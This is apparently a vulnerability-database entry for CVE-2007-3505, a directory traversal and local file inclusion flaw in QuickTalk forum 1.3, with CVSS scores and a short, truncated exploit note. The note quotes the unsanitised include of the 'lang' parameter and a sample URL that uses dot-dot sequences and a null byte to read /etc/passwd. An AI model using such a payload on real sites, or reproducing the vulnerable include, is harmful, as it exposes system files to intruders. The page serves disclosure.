6.4
CVSSv2

CVE-2007-3505

Published: 02/07/2007 Updated: 19/10/2017
CVSS v2 Base Score: 6.4 | Impact Score: 4.9 | Exploitability Score: 10
VMScore: 645
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:N

Vulnerability Summary

Multiple directory traversal vulnerabilities in QuickTalk forum 1.3 allow remote malicious users to include and execute arbitrary local files via a .. (dot dot) sequence in the lang parameter to (1) qtf_checkname.php, (2) qtf_j_birth.php, or (3) qtf_j_exists.php.

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

qt-cute quicktalk forum 1.3

Exploits

###QuickTalk forum v13 Local File Inclusion### #download: wwwqt-cuteorg/download/qtf13zip #found by: katatafish (karatatata@hushcom) #vulncode: $strLang = $_GET["lang"]; include("language/$strLang/qtf_lang_reginc"); #exploits: wwwsitecom/[path]/qtf_checknamephp?lang=///////////etc/passwd%00 http: ...